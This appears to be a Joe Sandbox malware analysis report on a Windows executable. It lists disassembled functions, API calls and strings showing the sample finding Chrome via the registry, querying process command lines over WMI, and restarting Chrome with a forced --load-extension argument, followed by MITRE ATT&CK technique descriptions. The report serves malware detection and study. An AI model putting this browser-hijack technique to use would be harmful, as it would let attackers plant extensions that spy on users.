C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip, xrefs: 00007FF7ABC22BC6
J, xrefs: 00007FF7ABC22BCD

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: __std_fs_convert_narrow_to_wide$ApisFile__std_fs_code_page
String ID: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip$J
API String ID: 1377543553-1822051254
Opcode ID: 562919172af5b9e87f5682eb6a0a24944c2d8dc34fa2571c2ff8a2ccba6cf4ea
Instruction ID: 2e6bea00d099abbbca007825c9aa9ce8d932c43fb65b8c609dde799ae12179fc
Opcode Fuzzy Hash: 562919172af5b9e87f5682eb6a0a24944c2d8dc34fa2571c2ff8a2ccba6cf4ea
Instruction Fuzzy Hash: 8DE04F52A1978682EA20AB18A4017AAE364FBCD308F840230EECC06775EF3CD3858B54

Analysis Process: graph.exePID: 7744, Parent PID: 7456COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	512
Total number of Limit Nodes:	3

Executed Functions

Function 00007FF6A22F3990 Relevance: 49.4, APIs: 9, Strings: 19, Instructions: 435
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6A22F9330: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A22F944B
Part of subcall function 00007FF6A22F9330: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6A22F9451

RegOpenKeyExW.KERNELBASE ref: 00007FF6A22F3B47
RegQueryValueExW.KERNELBASE ref: 00007FF6A22F3C7B
RegCloseKey.ADVAPI32 ref: 00007FF6A22F3D52
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A22F402D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A22F4033
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A22F4039
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A22F403F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A22F4045
RegCloseKey.KERNELBASE ref: 00007FF6A22F3EB7

Part of subcall function 00007FF6A22F85B0: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6A22F85F9
Part of subcall function 00007FF6A22F85B0: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6A22F861E
Part of subcall function 00007FF6A22F85B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6A22F8648
Part of subcall function 00007FF6A22F85B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6A22F86DC

Strings

Query for process command line failed., xrefs: 00007FF6A22F46EB
path, xrefs: 00007FF6A22F3C10
Failed to query registry value for Chrome path., xrefs: 00007FF6A22F3CA1
SOFTWARE\Google\Chrome\BLBeacon, xrefs: 00007FF6A22F3A1C
--type=e, xrefs: 00007FF6A22F4B47
Error: , xrefs: 00007FF6A22F3CB3, 00007FF6A22F3DE7, 00007FF6A22F43FE, 00007FF6A22F46FC, 00007FF6A22F4956
SELECT CommandLine FROM Win32_Process WHERE ProcessId = , xrefs: 00007FF6A22F44FA
xtension, xrefs: 00007FF6A22F4B51
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe, xrefs: 00007FF6A22F39F5
Failed to create IWbemLocator object., xrefs: 00007FF6A22F4945
SOFTWARE\WOW6432Node\Google\Chrome\BLBeacon, xrefs: 00007FF6A22F3A42
Failed to open registry key: , xrefs: 00007FF6A22F3DD1
ROOT\CIMV2, xrefs: 00007FF6A22F4334
Could not connect to WMI., xrefs: 00007FF6A22F43ED
--type=renderer, xrefs: 00007FF6A22F4AD6
BLBeacon, xrefs: 00007FF6A22F3BC8
Chrome path not found in registry., xrefs: 00007FF6A22F3FA3
CommandLine, xrefs: 00007FF6A22F486C
WQL, xrefs: 00007FF6A22F4608

Memory Dump Source

Source File: 00000004.00000002.2586715311.00007FF6A22F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A22F0000, based on PE: true

Associated: 00000004.00000002.2586654665.00007FF6A22F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586813305.00007FF6A232A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586833054.00007FF6A232D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6a22f0000_graph.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Lockitstd::_$CloseLockit::_Lockit::~_$Concurrency::cancel_current_taskOpenQueryValue
String ID: --type=e$--type=renderer$BLBeacon$Chrome path not found in registry.$CommandLine$Could not connect to WMI.$Error: $Failed to create IWbemLocator object.$Failed to open registry key: $Failed to query registry value for Chrome path.$Query for process command line failed.$ROOT\CIMV2$SELECT CommandLine FROM Win32_Process WHERE ProcessId = $SOFTWARE\Google\Chrome\BLBeacon$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe$SOFTWARE\WOW6432Node\Google\Chrome\BLBeacon$WQL$path$xtension
API String ID: 381035148-1962832953
Opcode ID: 24b9a8dd0c45d2cc3dd6b9011bf490f9b4e2d7b4f2176567959fe523597c4710
Instruction ID: 0009e5f61a09d941787f6631127ae3832513d604e7c759cca265f6e57a4a367c
Opcode Fuzzy Hash: 24b9a8dd0c45d2cc3dd6b9011bf490f9b4e2d7b4f2176567959fe523597c4710
Instruction Fuzzy Hash: DA02C062F9AB8185EB10DB65D5402BE2361FF857A8F505331EA6D83AD9DFBCD190D300

Function 00007FF6A22F5EA0 Relevance: 30.0, APIs: 2, Strings: 15, Instructions: 256
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A22F620E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A22F622F

Part of subcall function 00007FF6A22FCCC8: FindNextFileW.KERNEL32(?,?,?,?,00007FF6A22F357D,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00007FF6A22FCCCC

Strings

--load-e, xrefs: 00007FF6A22F64E5
chrome.exe, xrefs: 00007FF6A22F639F
status, xrefs: 00007FF6A22F6C07
directory_iterator::directory_iterator, xrefs: 00007FF6A22F6222
Error: , xrefs: 00007FF6A22F62D7, 00007FF6A22F69BA, 00007FF6A22F6D65
Info: , xrefs: 00007FF6A22F6555, 00007FF6A22F6755
Failed to create snapshot of processes., xrefs: 00007FF6A22F62C5
xtension, xrefs: 00007FF6A22F64EF
Main Chrome process already has --load-extension argument. No action taken., xrefs: 00007FF6A22F6743
&, xrefs: 00007FF6A22F699F
directory_entry::status, xrefs: 00007FF6A22F6239
Main Chrome process does not have --load-extension argument. Restarting Chrome with extensions., xrefs: 00007FF6A22F6543
Extensions path not found or invalid: , xrefs: 00007FF6A22F69A8
C:\Program Files\Google\Chrome\Extensions, xrefs: 00007FF6A22F660F
Chrome path is missing. Exiting., xrefs: 00007FF6A22F6D53

Memory Dump Source

Source File: 00000004.00000002.2586715311.00007FF6A22F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A22F0000, based on PE: true

Associated: 00000004.00000002.2586654665.00007FF6A22F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586813305.00007FF6A232A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586833054.00007FF6A232D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6a22f0000_graph.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$FileFindNext
String ID: &$--load-e$C:\Program Files\Google\Chrome\Extensions$Chrome path is missing. Exiting.$Error: $Extensions path not found or invalid: $Failed to create snapshot of processes.$Info: $Main Chrome process already has --load-extension argument. No action taken.$Main Chrome process does not have --load-extension argument. Restarting Chrome with extensions.$chrome.exe$directory_entry::status$directory_iterator::directory_iterator$status$xtension
API String ID: 2925584965-66935618
Opcode ID: e165e78220ce2ff56e5cfe31366d27908780c7a8eacbb97da4cfb996d85b6275
Instruction ID: 994ef20881de908de548c2f92121906e260141847c431a9b1ee43a254bd3f3bb
Opcode Fuzzy Hash: e165e78220ce2ff56e5cfe31366d27908780c7a8eacbb97da4cfb996d85b6275
Instruction Fuzzy Hash: 6BB1A672E4AB8182EB10CB25D64027E63A0FF85B98F148235DE5D83BA9DF7CD591D740

Function 00007FF6A22F4060 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.COMBASE ref: 00007FF6A22F406A
CoInitializeSecurity.COMBASE ref: 00007FF6A22F4170

Part of subcall function 00007FF6A22F85B0: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6A22F85F9
Part of subcall function 00007FF6A22F85B0: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6A22F861E
Part of subcall function 00007FF6A22F85B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6A22F8648
Part of subcall function 00007FF6A22F85B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6A22F86DC

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A22F4251
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A22F4257

Strings

Failed to initialize security., xrefs: 00007FF6A22F4196
Error: , xrefs: 00007FF6A22F40A4, 00007FF6A22F41A8
Failed to initialize COM library., xrefs: 00007FF6A22F4092

Memory Dump Source

Source File: 00000004.00000002.2586715311.00007FF6A22F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A22F0000, based on PE: true

Associated: 00000004.00000002.2586654665.00007FF6A22F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586813305.00007FF6A232A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586833054.00007FF6A232D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6a22f0000_graph.jbxd

Similarity

API ID: Lockitstd::_$InitializeLockit::_Lockit::~__invalid_parameter_noinfo_noreturn$Security
String ID: Error: $Failed to initialize COM library.$Failed to initialize security.
API String ID: 2382761477-123418321
Opcode ID: ba260c1c2a26161347653c039e5bbf3f01a4e87380301f3cc0760fa37486ee4d
Instruction ID: 3e7740debcd8780496b5b77f69f9122007f7ebdc9c74b426e2cc9a7941701551
Opcode Fuzzy Hash: ba260c1c2a26161347653c039e5bbf3f01a4e87380301f3cc0760fa37486ee4d
Instruction Fuzzy Hash: A151C7A2B9AB4282EE00DB65E54027E6351EFD5798F504231EA5DC3AE9DFFCE090D700

Function 00007FF6A230A288 Relevance: 9.1, APIs: 6, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,00007FF6A2303A8D,?,?,?,?,00007FF6A2309D90), ref: 00007FF6A230A297
FlsSetValue.KERNEL32(?,?,?,00007FF6A2303A8D,?,?,?,?,00007FF6A2309D90), ref: 00007FF6A230A2CD
FlsSetValue.KERNEL32(?,?,?,00007FF6A2303A8D,?,?,?,?,00007FF6A2309D90), ref: 00007FF6A230A2FA
FlsSetValue.KERNEL32(?,?,?,00007FF6A2303A8D,?,?,?,?,00007FF6A2309D90), ref: 00007FF6A230A30B
FlsSetValue.KERNEL32(?,?,?,00007FF6A2303A8D,?,?,?,?,00007FF6A2309D90), ref: 00007FF6A230A31C
SetLastError.KERNEL32(?,?,?,00007FF6A2303A8D,?,?,?,?,00007FF6A2309D90), ref: 00007FF6A230A337

Memory Dump Source

Source File: 00000004.00000002.2586715311.00007FF6A22F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A22F0000, based on PE: true

Associated: 00000004.00000002.2586654665.00007FF6A22F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586813305.00007FF6A232A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586833054.00007FF6A232D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6a22f0000_graph.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: f2a1fb28ecb3c33ef7905b00eb992fa680b77dbb01d10cbc44ffca28e50c3a95
Instruction ID: 6d8c6c410e818c23e3410e77ef510a18855f330c2e008946e4ec7815ed83386d
Opcode Fuzzy Hash: f2a1fb28ecb3c33ef7905b00eb992fa680b77dbb01d10cbc44ffca28e50c3a95
Instruction Fuzzy Hash: 4311A120E9FF4242FA1C5331665513923926F4A7B8F1447B4DA2E866C6DEACF402A364

Function 00007FF6A22FDDA4 Relevance: 4.6, APIs: 3, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6A22FDA90: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6A22FDAA4

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF6A22FDDC8
__scrt_release_startup_lock.LIBCMT ref: 00007FF6A22FDE36
__scrt_get_show_window_mode.LIBCMT ref: 00007FF6A22FDE89

Memory Dump Source

Source File: 00000004.00000002.2586715311.00007FF6A22F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A22F0000, based on PE: true

Associated: 00000004.00000002.2586654665.00007FF6A22F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586813305.00007FF6A232A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586833054.00007FF6A232D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6a22f0000_graph.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: c4a13060624ac91f3377dc4cc097d7834cd0d7b54bd5f9c261dcc4a468dbd74e
Instruction ID: ca0ccc6445686374737a8951b79f736552d06ae99e2c983b50e6ea319b302402
Opcode Fuzzy Hash: c4a13060624ac91f3377dc4cc097d7834cd0d7b54bd5f9c261dcc4a468dbd74e
Instruction Fuzzy Hash: 0E316E20ECF64341FA24AB25D6123BA2391AF5274CF8400B5E50ECB6DBDEECE414F651

Function 00007FF6A22FDA90 Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6A22FDAA4

Part of subcall function 00007FF6A22FFCB0: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF6A22FFCB8
Part of subcall function 00007FF6A22FFCB0: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF6A22FFCBD

Memory Dump Source

Source File: 00000004.00000002.2586715311.00007FF6A22F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A22F0000, based on PE: true

Associated: 00000004.00000002.2586654665.00007FF6A22F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586813305.00007FF6A232A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586833054.00007FF6A232D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6a22f0000_graph.jbxd

Similarity

API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
String ID:
API String ID: 1208906642-0
Opcode ID: c5d88f84bb4b83c855101d1bcf7bd546a7308184fc82c24ecf2dd024a6b03203
Instruction ID: 4510356fd02e7ab49e24f38acdbcbad4f848895df993728d65835d324c501ab6
Opcode Fuzzy Hash: c5d88f84bb4b83c855101d1bcf7bd546a7308184fc82c24ecf2dd024a6b03203
Instruction Fuzzy Hash: 4FE0B614DCF64340FD66762003126BB03411F2234DF4418B8D85DC26CB9DCDA566B22A

Function 00007FF6A230A410 Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF6A230A43B

Memory Dump Source

Source File: 00000004.00000002.2586715311.00007FF6A22F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A22F0000, based on PE: true

Associated: 00000004.00000002.2586654665.00007FF6A22F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586813305.00007FF6A232A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586833054.00007FF6A232D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6a22f0000_graph.jbxd

Similarity

API ID: __vcrt_uninitialize_ptd
String ID:
API String ID: 1180542099-0
Opcode ID: 5de98303c41e9346c0a2a760e4f8f991aee0dd986fe3d4573fbd14565e1c3639
Instruction ID: 90d3ff20467c77a9a516117babf8f0791e16d43ec0166c72f253fd69f6cb64ff
Opcode Fuzzy Hash: 5de98303c41e9346c0a2a760e4f8f991aee0dd986fe3d4573fbd14565e1c3639
Instruction Fuzzy Hash: FEE08C68ECFE0282E95C6B3034460B813402F2731CFA40AF4DB1EC23C2EEAD65023231

Function 00007FF6A230AE30 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF6A230A2EA,?,?,?,00007FF6A2303A8D,?,?,?,?,00007FF6A2309D90), ref: 00007FF6A230AE85

Memory Dump Source

Source File: 00000004.00000002.2586715311.00007FF6A22F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A22F0000, based on PE: true

Associated: 00000004.00000002.2586654665.00007FF6A22F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586813305.00007FF6A232A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2586833054.00007FF6A232D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6a22f0000_graph.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 2468a55251dc1a4b06199852671c7c6a39654f1c1ef5f0a76e1adb49ec930e94
Instruction ID: 1100e818061e2b07e4b668b42435e44c97d4e67ac24aa529beaf16abafb48b0b
Opcode Fuzzy Hash: 2468a55251dc1a4b06199852671c7c6a39654f1c1ef5f0a76e1adb49ec930e94
Instruction Fuzzy Hash: DDF06D44B8FF0341FE59576265402F553845F8AF88F0C98B4CA8EC63D1EE9CE980E230

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Persistence and Installation Behavior

Boot Survival

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

